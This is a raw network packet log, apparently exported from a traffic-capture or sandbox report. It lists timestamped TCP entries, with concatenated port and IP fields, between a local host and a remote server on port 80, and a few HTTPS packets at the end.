                                                                                                                                                                                                            Nov 21, 2024 15:17:34.960593939 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.961141109 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.961272001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.961349964 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.961880922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.962053061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.962229967 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.962650061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.962753057 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.962791920 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.963346004 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.963371992 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.963622093 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.964092016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.964234114 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.964481115 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.964826107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.964936018 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.964975119 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.965532064 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.965652943 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.965697050 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.966263056 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.966432095 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.966511965 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.966995001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.967108011 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.967145920 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.967699051 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.967823982 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.967892885 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.968444109 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.968554020 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.968594074 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.969162941 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.969273090 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.969314098 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.969892025 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.970011950 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.970052004 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.970658064 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.970788956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.970829010 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.971349001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.971445084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.971491098 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.972084999 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.972197056 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.972620964 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.972811937 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.972946882 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.972987890 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.973562002 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.973628998 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.973663092 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.974280119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.974423885 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.974827051 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.975020885 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.975152016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.975738049 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.975779057 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.975928068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.976136923 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.987991095 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988064051 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988075972 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988090038 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988109112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988116026 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988121033 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988135099 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988157034 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988177061 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988248110 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988260031 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988271952 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988285065 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988297939 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988301039 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988312960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988322973 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988326073 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988338947 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988341093 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988351107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988373041 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988398075 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988452911 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988545895 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988557100 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988569975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988580942 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988584042 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988593102 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988604069 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988631964 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988672018 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988683939 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988696098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988708019 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988718033 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988718033 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988732100 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988744020 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988751888 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988754988 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988768101 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988780022 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988780975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988792896 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988800049 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.988827944 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.030724049 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.161183119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.161314011 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.161324978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.161384106 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.161444902 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.161535978 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162071943 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162086010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162122011 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162400007 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162414074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162452936 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162607908 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162900925 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.162975073 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.163402081 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.163620949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.163665056 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.164104939 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.164223909 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.164264917 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.164830923 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.164946079 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.164985895 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.165555000 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.165643930 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.165683985 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.166295052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.166412115 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.166452885 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.167026043 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.167108059 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.167146921 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.167752028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.167855024 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.167917967 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.169251919 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.169267893 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.169281006 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.169295073 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.169308901 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.169358969 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.169936895 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.170691967 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.170737028 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173788071 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173803091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173815012 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173825979 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173841000 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173847914 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173860073 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173872948 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173877954 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173896074 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173902035 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.173950911 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.174546003 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.174727917 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.174817085 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.175344944 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.175487041 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.175534010 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.176017046 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.176158905 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.176276922 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.176785946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.176954985 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.177016020 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.177427053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.177586079 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.177628994 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.178210974 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.178359032 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.178390980 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.178867102 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.178988934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.179080009 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.179478884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.179491043 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.179502010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.179514885 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.179528952 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.179553032 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.180108070 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.180216074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.180257082 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.180838108 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.180917978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.180957079 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.181557894 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.181674004 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.181715012 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.182295084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.182421923 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.182467937 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.183012962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.183135986 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.183178902 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.183768988 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.183870077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.183912039 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.184489965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.184602976 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.184665918 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.185220003 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.185316086 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.185354948 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.185930967 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.186047077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.186089993 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.186683893 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.186817884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.186857939 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.187426090 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.187742949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.187788010 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.188186884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.188246965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.188303947 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.188608885 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.188859940 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.188986063 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.189562082 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.189599991 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.189644098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.189678907 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.190280914 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.190365076 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.190598965 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.191025019 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.191098928 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.191133976 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.191766024 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.191906929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.192053080 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.192481995 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.192588091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.192653894 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.193237066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.193346977 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.193409920 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.193931103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.194068909 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.194257975 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.194690943 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.194755077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.194837093 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.195404053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.195518017 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.195559978 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.196158886 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.196233988 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.196279049 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.196902990 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.196980953 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.197015047 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.197581053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.197710991 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.197750092 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.198307991 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.207886934 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.215279102 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.215918064 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.215933084 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.216332912 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.216337919 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.261224985 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.262161016 CET49780443192.168.2.613.107.246.45
